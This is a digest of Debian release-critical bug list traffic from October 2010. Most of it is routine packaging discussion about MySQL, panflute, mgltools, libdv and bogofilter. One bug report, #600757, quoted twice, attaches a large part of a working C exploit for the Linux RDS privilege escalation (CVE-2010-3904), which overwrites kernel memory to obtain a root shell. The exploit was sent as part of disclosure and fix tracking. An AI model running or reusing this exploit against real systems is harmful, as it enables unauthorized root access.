ii  libcommandline-ruby   0.7.10-10  Ruby library to write command-line
ii  libhpricot-ruby   0.8.2-1fast, enjoyable HTML parser
ii  libruby   4.5Libraries necessary to run Ruby 1.
ii  ruby  4.5An interpreter of object-oriented 

dh-make-drupal recommends no packages.

Versions of packages dh-make-drupal suggests:
ii  drupal6   6.18-1 a fully-featured content managemen

-- no debconf information




--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#589513: [debian-mysql] Bug#589513: /etc/init.d/mysql: line 75: /usr/bin/mysqladmin: No such file or directory

2010-10-19 Thread Norbert Tretkowski
Hi,

first of all, sorry for not answering earlier. Too much real and work
life took place during the last weeks, hence I had nearly no time for
Debian, and I'm currently the only one taking care of MySQL in Debian at
the moment.

Am Montag, den 18.10.2010, 09:47 +0200 schrieb Christian PERRIER:
 I have a plan to NMU the package for pending localization bugs. I can
 apply this as well unless a maintainer objects.

I plan to upload 5.1.49-2 within the next days (I only need to do some
testing), and I also plan to add the pending debconf translations to
that upload.

 Please  note that #599937 also needs to be addressed (it should be
 done by uploading the version from experimental, from what I understand).

I'm not yet sure how to handle this, I didn't had time to take a closer
look at the security issues. Either I'm going to try getting 5.1.51 into
unstable (and testing as well), or I'm going to upload 5.1.49-3 when I'm
able to separate and backport the fixes.

Norbert




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: tagging 598174

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 598174 - squeeze
Bug #598174 [src:helium] helium: FTBFS: Unable to locate package uuagc
Removed tag(s) squeeze.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
598174: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=598174
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#597590: panflute: diff for NMU version 0.6.2-1.1

2010-10-19 Thread Michael Fladischer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi!

Alexander Reichle-Schmehl, 2010-10-19 16:23:
 tags 597590 + patch
 tags 597590 + pending
 thanks
 
 Dear maintainer,
 
 I've prepared an NMU for panflute (versioned as 0.6.2-1.1) and
 uploaded it to DELAYED/2. Please feel free to tell me if I
 should delay it longer.

I've prepared a version 0.6.2-2 a month ago[0], which fixes:
 * #04
 * #597590
 * #597591

My initial sponsor (Christoph Egger) did not have the time yet to
sponsor the new version.

[0] http://svn.debian.org/viewsvn/python-apps/packages/panflute/trunk/

Regards

- -- 
Michael Fladischer
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAky93tQACgkQeJ3z1zFMUGZ1pwCeJFLXRLrrK9rQHQmK8Zj1ewrw
UU8Anj33p1odXUBEikwDpKi8c87yYuVM
=uVmZ
-END PGP SIGNATURE-



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#586849: marked as done (mgltools-utpackages: depends on python ( 2.6))

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 19:23:21 +0100
with message-id 1287512601.10470.3.ca...@arneb.retout.co.uk
and subject line Re: mgltools-utpackages: depends on python ( 2.6)
has caused the Debian Bug report #586849,
regarding mgltools-utpackages: depends on python ( 2.6)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
586849: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=586849
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---

Package: mgltools-bhtree
Version: 1.5.4.cvs.20090603-1
Severity: serious
User: debian-pyt...@lists.debian.org
Usertag: python2.6

Hello,

Most of the mgltools-* packages depend on python ( 2.6) and are 
therefore currently uninstallable in sid.


--
Jakub Wilk


signature.asc
Description: Digital signature
---End Message---
---BeginMessage---
Version: 1.5.4.cvs.20100912-1

Confirming as fixed in (at least) the above version.  It's pycentral's
versioning stuff...

-- 
Tim Retout dioc...@debian.org

---End Message---


Bug#589513: [debian-mysql] Bug#589513: /etc/init.d/mysql: line 75: /usr/bin/mysqladmin: No such file or directory

2010-10-19 Thread Christian PERRIER
Quoting Norbert Tretkowski (norb...@tretkowski.de):

 Am Montag, den 18.10.2010, 09:47 +0200 schrieb Christian PERRIER:
  I have a plan to NMU the package for pending localization bugs. I can
  apply this as well unless a maintainer objects.
 
 I plan to upload 5.1.49-2 within the next days (I only need to do some
 testing), and I also plan to add the pending debconf translations to
 that upload.

OK, Norbert.

I transform my I will NMU into a the maintainer will
upload. Still, I sent a call for translation updates that will last
for the next 4 days. 

Do you think that the upload can wait for this (no idea whether there
will be updates, one never knowsso in case you have other
constraints, then don't wait for me). 

At the end of that time period (and if you haven't uploaded yet, of
course), I'll give you a go about l10n...



signature.asc
Description: Digital signature


Processed: your mail

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 539678 grave
Bug #539678 [mindi] mindi/mondo: does not create boot CD with new grub2
Severity set to 'grave' from 'important'


End of message, stopping processing here.

Please contact me if you need assistance.
-- 
539678: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=539678
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#600757: linux-2.6: Linux RDS Protocol Local Privilege Escalation

2010-10-19 Thread Juan Angulo Moreno
Package: linux-2.6
Version: 2.6.32-5-686
Severity: critical
Tags: security
Justification: root security hole

There is a security hole in all versions of linux-2.6 distributed by Debian.

The attached exploit code can be used to test if a kernel is vulnerable,
it starts a root shell.

I test it in Debian Squeeze, a screenshot can be found in
http://i56.tinypic.com/2nh19v6.png


-- 
Juan Angulo Moreno
/* 
 * Linux Kernel = 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg drosenb...@vsecurity.com
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include stdio.h
#include unistd.h
#include stdlib.h
#include fcntl.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include errno.h
#include string.h
#include sys/ptrace.h
#include sys/utsname.h

#define RECVPORT  
#define SENDPORT 

int prep_sock(int port)
{
	
	int s, ret;
	struct sockaddr_in addr;

	s = socket(PF_RDS, SOCK_SEQPACKET, 0);

	if(s  0) {
		printf([*] Could not open socket.\n);
		exit(-1);
	}
	
	memset(addr, 0, sizeof(addr));

	addr.sin_addr.s_addr = inet_addr(127.0.0.1);
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);

	ret = bind(s, (struct sockaddr *)addr, sizeof(addr));

	if(ret  0) {
		printf([*] Could not bind socket.\n);
		exit(-1);
	}

	return s;

}

void get_message(unsigned long address, int sock)
{

	recvfrom(sock, (void *)address, sizeof(void *), 0,
		 NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
	
	int size, ret;
	struct sockaddr_in recvaddr;
	struct msghdr msg;
	struct iovec iov;
	unsigned long buf;
	
	memset(recvaddr, 0, sizeof(recvaddr));

	size = sizeof(recvaddr);

	recvaddr.sin_port = htons(RECVPORT);
	recvaddr.sin_family = AF_INET;
	recvaddr.sin_addr.s_addr = inet_addr(127.0.0.1);

	memset(msg, 0, sizeof(msg));
	
	msg.msg_name = recvaddr;
	msg.msg_namelen = sizeof(recvaddr);
	msg.msg_iovlen = 1;
	
	buf = value;

	iov.iov_len = sizeof(buf);
	iov.iov_base = buf;

	msg.msg_iov = iov;

	ret = sendmsg(sock, msg, 0);
	if(ret  0) {
		printf([*] Something went wrong sending.\n);
		exit(-1);
	}
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

	if(!fork()) {
			sleep(1);
			send_message(value, sendsock);
			exit(1);
	}
	else {
		get_message(addr, recvsock);
		wait(NULL);
	}

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

	commit_creds(prepare_kernel_cred(0));
	return -1;	

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
	FILE *f;
	unsigned long addr;
	char dummy;
	char sname[512];
	struct utsname ver;
	int ret;
	int rep = 0;
	int oldstyle = 0;

	f = fopen(/proc/kallsyms, r);
	if (f == NULL) {
		f = fopen(/proc/ksyms, r);
		if (f == NULL)
			goto fallback;
		oldstyle = 1;
	}

repeat:
	ret = 0;
	while(ret != EOF) {
		if (!oldstyle)
			ret = fscanf(f, %p %c %s\n, (void **)addr, dummy, sname);
		else {
			ret = fscanf(f, %p %s\n, (void **)addr, sname);
			if (ret == 2) {
char *p;
if (strstr(sname, _O/) || strstr(sname, _S.))
	continue;
p = strrchr(sname, '_');
if (p  ((char *)sname + 5)  !strncmp(p - 3, smp, 3)) {
	p = p - 4;
	while (p  (char *)sname  *(p - 1) == '_')
		p--;
	*p = '\0';
}
			}
		}
		if (ret == 0) {
			fscanf(f, %s\n, sname);
			continue;
		}
		if (!strcmp(name, sname)) {
			fprintf(stdout,  [+] Resolved %s to %p%s\n, name, (void *)addr, rep ?  (via System.map) : );
			fclose(f);
			return addr;
		}
	}

	fclose(f);
	if (rep)
		return 0;
fallback:
	/* didn't find the symbol, let's retry with the System.map
	   dedicated to the 

Bug#579527: marked as done (libdv4 - recommends oss-compat)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 19:02:17 +
with message-id e1p8hrx-0002l0...@franck.debian.org
and subject line Bug#579527: fixed in libdv 1.0.0-2.1
has caused the Debian Bug report #579527,
regarding libdv4 - recommends oss-compat
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
579527: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=579527
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: libdv4
Version: 1.0.0-2
Severity: important

libdv4 recommends oss-compat. OSS support is highly deprecated and not
suitable for a package in the GUI task.

Bastian

-- 
You're dead, Jim.
-- McCoy, The Tholian Web, stardate unknown


---End Message---
---BeginMessage---
Source: libdv
Source-Version: 1.0.0-2.1

We believe that the bug you reported is fixed in the latest version of
libdv, which is due to be installed in the Debian FTP archive:

libdv-bin_1.0.0-2.1_amd64.deb
  to main/libd/libdv/libdv-bin_1.0.0-2.1_amd64.deb
libdv4-dev_1.0.0-2.1_amd64.deb
  to main/libd/libdv/libdv4-dev_1.0.0-2.1_amd64.deb
libdv4_1.0.0-2.1_amd64.deb
  to main/libd/libdv/libdv4_1.0.0-2.1_amd64.deb
libdv_1.0.0-2.1.diff.gz
  to main/libd/libdv/libdv_1.0.0-2.1.diff.gz
libdv_1.0.0-2.1.dsc
  to main/libd/libdv/libdv_1.0.0-2.1.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 579...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Neil Williams codeh...@debian.org (supplier of updated libdv package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Sat, 16 Oct 2010 19:55:28 +0100
Source: libdv
Binary: libdv4 libdv4-dev libdv-bin
Architecture: source amd64
Version: 1.0.0-2.1
Distribution: unstable
Urgency: low
Maintainer: Daniel Kobras kob...@debian.org
Changed-By: Neil Williams codeh...@debian.org
Description: 
 libdv-bin  - software library for DV format digital video (sample apps)
 libdv4 - software library for DV format digital video (runtime lib)
 libdv4-dev - software library for DV format digital video (devel files)
Closes: 579527
Changes: 
 libdv (1.0.0-2.1) unstable; urgency=low
 .
   * Non-maintainer upload.
   * Change libdv4 from recommending oss-compat to linux-sound-base
 (Closes: #579527)
Checksums-Sha1: 
 150016ddfd702bc7f062d0c4f828bea1b7533c70 1180 libdv_1.0.0-2.1.dsc
 dbcbf75af56d501c1b352e445ddf2f3b4917e2a5 10102 libdv_1.0.0-2.1.diff.gz
 26748df0313d3364ec6e265b97cd899c03ff6d60 82666 libdv4_1.0.0-2.1_amd64.deb
 ecf6edf7f570f1136f750b28a5149c08a6b8d451 92250 libdv4-dev_1.0.0-2.1_amd64.deb
 371209d194089a22586a834db5bae08ccf67a6d1 35866 libdv-bin_1.0.0-2.1_amd64.deb
Checksums-Sha256: 
 3f20cf2211a81d216aabd199df9d4e1a29fe0ca4409d4dc62e81b937b6f78da2 1180 
libdv_1.0.0-2.1.dsc
 1863201234698d30fea7a5d1be875e5be9d42c99b93110e17724e1466d6f044e 10102 
libdv_1.0.0-2.1.diff.gz
 4ff7f01a72d6d483e524a076c65e05b487bfa80bc13d5195291253cb38e7d193 82666 
libdv4_1.0.0-2.1_amd64.deb
 1fe64a3e35be205826ba36a47cea1df74ab5e97d8ae09c03a16a2ecf899d 92250 
libdv4-dev_1.0.0-2.1_amd64.deb
 a02ef9c9ca7b62ad42b1a995e601655c95c9341ac6db6c1fbfbd76d0068355ef 35866 
libdv-bin_1.0.0-2.1_amd64.deb
Files: 
 46997d210159f51fc1073cbc04e9dd0b 1180 graphics optional libdv_1.0.0-2.1.dsc
 3d21af14c43408bd34a238e5f502d508 10102 graphics optional 
libdv_1.0.0-2.1.diff.gz
 34ce9d1b69932d683afb2270fd8466a9 82666 libs optional libdv4_1.0.0-2.1_amd64.deb
 57fbd775f34e7e4e15bcc8cce47febd4 92250 libdevel extra 
libdv4-dev_1.0.0-2.1_amd64.deb
 d275b5c41bf18d444209e4af5eb1953c 35866 graphics extra 
libdv-bin_1.0.0-2.1_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAky7QPwACgkQiAEJSii8s+Ng8gCeIDtv4RRL/KA+f25mFYut3nrn
wI4An30HFkn1KNCmmEW/3h5VlG0wDUUl
=sy+K
-END PGP SIGNATURE-


---End Message---


Processed: notfound 600757 in 2.6.32-5-686, found 600757 in 2.6.32-25

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 notfound 600757 2.6.32-5-686
Bug #600757 [linux-2.6] linux-2.6: Linux RDS Protocol Local Privilege Escalation
There is no source info for the package 'linux-2.6' at version '2.6.32-5-686' 
with architecture ''
Unable to make a source version for version '2.6.32-5-686'
Bug No longer marked as found in versions 2.6.32-5-686.
 found 600757 2.6.32-25
Bug #600757 [linux-2.6] linux-2.6: Linux RDS Protocol Local Privilege Escalation
There is no source info for the package 'linux-2.6' at version '2.6.32-25' with 
architecture ''
Unable to make a source version for version '2.6.32-25'
Bug Marked as found in versions 2.6.32-25.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600757: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600757
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#600757: Possible Fix

2010-10-19 Thread Juan Angulo Moreno
tag 600757 pending
thanks

It is patch can fix:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f


-- 
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#600757: marked as done (linux-2.6: Linux RDS Protocol Local Privilege Escalation)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 13:47:39 -0600
with message-id 20101019194739.gb3...@lackof.org
and subject line closing
has caused the Debian Bug report #600757,
regarding linux-2.6: Linux RDS Protocol Local Privilege Escalation
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
600757: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600757
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: linux-2.6
Version: 2.6.32-5-686
Severity: critical
Tags: security
Justification: root security hole

There is a security hole in all versions of linux-2.6 distributed by Debian.

The attached exploit code can be used to test if a kernel is vulnerable,
it starts a root shell.

I test it in Debian Squeeze, a screenshot can be found in
http://i56.tinypic.com/2nh19v6.png


-- 
Juan Angulo Moreno
/* 
 * Linux Kernel = 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg drosenb...@vsecurity.com
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include stdio.h
#include unistd.h
#include stdlib.h
#include fcntl.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include errno.h
#include string.h
#include sys/ptrace.h
#include sys/utsname.h

#define RECVPORT  
#define SENDPORT 

int prep_sock(int port)
{
	
	int s, ret;
	struct sockaddr_in addr;

	s = socket(PF_RDS, SOCK_SEQPACKET, 0);

	if(s  0) {
		printf([*] Could not open socket.\n);
		exit(-1);
	}
	
	memset(addr, 0, sizeof(addr));

	addr.sin_addr.s_addr = inet_addr(127.0.0.1);
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);

	ret = bind(s, (struct sockaddr *)addr, sizeof(addr));

	if(ret  0) {
		printf([*] Could not bind socket.\n);
		exit(-1);
	}

	return s;

}

void get_message(unsigned long address, int sock)
{

	recvfrom(sock, (void *)address, sizeof(void *), 0,
		 NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
	
	int size, ret;
	struct sockaddr_in recvaddr;
	struct msghdr msg;
	struct iovec iov;
	unsigned long buf;
	
	memset(recvaddr, 0, sizeof(recvaddr));

	size = sizeof(recvaddr);

	recvaddr.sin_port = htons(RECVPORT);
	recvaddr.sin_family = AF_INET;
	recvaddr.sin_addr.s_addr = inet_addr(127.0.0.1);

	memset(msg, 0, sizeof(msg));
	
	msg.msg_name = recvaddr;
	msg.msg_namelen = sizeof(recvaddr);
	msg.msg_iovlen = 1;
	
	buf = value;

	iov.iov_len = sizeof(buf);
	iov.iov_base = buf;

	msg.msg_iov = iov;

	ret = sendmsg(sock, msg, 0);
	if(ret  0) {
		printf([*] Something went wrong sending.\n);
		exit(-1);
	}
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

	if(!fork()) {
			sleep(1);
			send_message(value, sendsock);
			exit(1);
	}
	else {
		get_message(addr, recvsock);
		wait(NULL);
	}

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

	commit_creds(prepare_kernel_cred(0));
	return -1;	

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
	FILE *f;
	unsigned long addr;
	char dummy;
	char sname[512];
	struct utsname ver;
	int ret;
	int rep = 0;
	int oldstyle = 0;

	f = fopen(/proc/kallsyms, r);
	if (f == NULL) {
		f = fopen(/proc/ksyms, r);
		if (f == NULL)
			goto fallback;
		oldstyle = 1;
	}


Bug#597590: panflute: diff for NMU version 0.6.2-1.1

2010-10-19 Thread Alexander Reichle-Schmehl
Hi!

* Michael Fladischer mich...@fladi.at [101019 20:09]:

 I've prepared a version 0.6.2-2 a month ago[0], which fixes:
  * #04
  * #597590
  * #597591

Uhm, sorry, but you could have mailed that to the bug report.  Seeing it
just tagged pending since quite some time (during a freeze) made me more
think someone forgot about it, than someone is taking care of it.


 My initial sponsor (Christoph Egger) did not have the time yet to
 sponsor the new version.

If you can show me your source package, I'll sponsor the upload for you
(with or without the non-rc-bug fixes; decide yourself and ask the
release team for an unblock).


Best Regards,
  Alexander


signature.asc
Description: Digital signature


Bug#592417: Bug #592417: mgltools-utpackages: ships files in /build

2010-10-19 Thread Tim Retout
tag 592417 patch
thanks

Hi Steffen,

I think it's the odd manipulation in setup.py which is causing these
files in /build.  This patch puts the files back in the right places:

--- mgltools-utpackages-1.5.4.cvs.20100912.orig/setup.py
+++ mgltools-utpackages-1.5.4.cvs.20100912/setup.py
@@ -101,24 +101,7 @@
 class modified_install(install):
 
 def run(self):
-self.install_lib = self.install_platlib
-install_platlib =  path.abspath(self.install_platlib)
-install_purelib = install_platlib
-print  install_platlib=, install_platlib
-print install_purelib=, install_purelib
 args = sys.argv
-bdist = 0
-for i, arg in enumerate(args[1:]):
-if string.find(arg, --install-platlib) != -1:
-platlib_fl = 1
-args[i+1] = --install-platlib=+install_platlib
-elif string.find(arg, --install-purelib) != -1:
-purelib_fl = 1
-args[i+1] = --install-purelib=+install_purelib
-elif string.find(arg, bdist) != -1:
-bdist = 1
-args[i+1] = install
-args.append(--install-platlib=+install_platlib)
 cmd = %s%sys.executable
 for e in args:
 cmd = cmd +   + e


Would you be able to test that the package behaves as before?

Regards,

-- 
Tim Retout dioc...@debian.org


signature.asc
Description: This is a digitally signed message part


Processed: Re: Bug #592417: mgltools-utpackages: ships files in /build

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tag 592417 patch
Bug #592417 [mgltools-utpackages] mgltools-utpackages: ships files in /build
Added tag(s) patch.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
592417: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=592417
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#592457: severity of 592457 is serious

2010-10-19 Thread Torsten Werner
Hi,

Am 19.10.2010 10:21, schrieb Sam Hocevar:
Also, maybe being more transparent about how much money you make

please, may we stop making the issue more complicated? There are already
good replies (with open questions) to this bug report.

Thanks,
Torsten



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#590147: Akregator is unusable crash at each start

2010-10-19 Thread Modestas Vainius
Hello,

On šeštadienis 04 Rugsėjis 2010 15:05:44 Bastien ROUCARIES wrote:
 severity 590147 serious
 forwarded 590147  https://bugs.kde.org/show_bug.cgi?id=250162
 
 I get a backtrace and forwarded to upstream. Akregator is unusable so
 increase to serious.

Can we both agree that this bug is not release-critical? Many users including 
me can start akregator fine. You probably ran into some kind of cache 
corruption issue here. It should be rare and many users will never see it 
hence it does not qualify as grave or serious, imho.

-- 
Modestas Vainius modes...@vainius.eu


signature.asc
Description: This is a digitally signed message part.


Bug#600489: marked as done (bogofilter-bdb: overwrites files from bogofilter-common)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 21:02:35 +
with message-id e1p8jkn-0002fa...@franck.debian.org
and subject line Bug#600489: fixed in bogofilter 1.2.2-2
has caused the Debian Bug report #600489,
regarding bogofilter-bdb: overwrites files from bogofilter-common
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
600489: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600489
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: bogofilter-bdb
Version: 1.2.2-1

After upgrade from lenny debsums complains:
/usr/share/doc/bogofilter-common/NEWS.Debian.gz   FAILED
(or
/usr/share/doc/bogofilter-bdb/NEWS.Debian.gz  FAILED
depending on package unpacking order)


That's because /usr/share/doc/bogofilter-bdb is a symlink in lenny and
bogofilter-bdb's maintainer scripts in squeeze do not handle changing
it to a directory. (dpkg cannot do it on its own per policy 6.6 4.)

As a result symlink is still there and both packages install files into
/usr/share/doc/bogofilter-common:

lrwxrwxrwx. 1 root root 17 Дек 17  2006 /usr/share/doc/bogofilter-bdb - 
bogofilter-common



-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (900, 'testing'), (300, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/2 CPU cores)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages bogofilter-bdb depends on:
ii  bogofilter-common1.2.2-1 a fast Bayesian spam filter (commo
ii  libc62.11.2-6Embedded GNU C Library: Shared lib
ii  libdb4.8 4.8.30-2Berkeley v4.8 Database Libraries [
ii  libgsl0ldbl  1.14+dfsg-1 GNU Scientific Library (GSL) -- li

bogofilter-bdb recommends no packages.

Versions of packages bogofilter-bdb suggests:
pn  db4.8-utilnone (no description available)

-- no debconf information

-- debsums errors found:
debsums: changed file /usr/share/doc/bogofilter-bdb/NEWS.Debian.gz (from 
bogofilter-bdb package)


---End Message---
---BeginMessage---
Source: bogofilter
Source-Version: 1.2.2-2

We believe that the bug you reported is fixed in the latest version of
bogofilter, which is due to be installed in the Debian FTP archive:

bogofilter-bdb_1.2.2-2_i386.deb
  to main/b/bogofilter/bogofilter-bdb_1.2.2-2_i386.deb
bogofilter-common_1.2.2-2_all.deb
  to main/b/bogofilter/bogofilter-common_1.2.2-2_all.deb
bogofilter-sqlite_1.2.2-2_i386.deb
  to main/b/bogofilter/bogofilter-sqlite_1.2.2-2_i386.deb
bogofilter-tokyocabinet_1.2.2-2_i386.deb
  to main/b/bogofilter/bogofilter-tokyocabinet_1.2.2-2_i386.deb
bogofilter_1.2.2-2.debian.tar.gz
  to main/b/bogofilter/bogofilter_1.2.2-2.debian.tar.gz
bogofilter_1.2.2-2.dsc
  to main/b/bogofilter/bogofilter_1.2.2-2.dsc
bogofilter_1.2.2-2_i386.deb
  to main/b/bogofilter/bogofilter_1.2.2-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 600...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Serafeim Zanikolas s...@debian.org (supplier of updated bogofilter package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Mon, 18 Oct 2010 20:51:27 +0200
Source: bogofilter
Binary: bogofilter bogofilter-bdb bogofilter-sqlite bogofilter-tokyocabinet 
bogofilter-common
Architecture: source i386 all
Version: 1.2.2-2
Distribution: unstable
Urgency: high
Maintainer: Serafeim Zanikolas s...@debian.org
Changed-By: Serafeim Zanikolas s...@debian.org
Description: 
 bogofilter - a fast Bayesian spam filter (dummy package)
 bogofilter-bdb - a fast Bayesian spam filter (Berkeley DB)
 bogofilter-common - a fast Bayesian spam filter (common files)
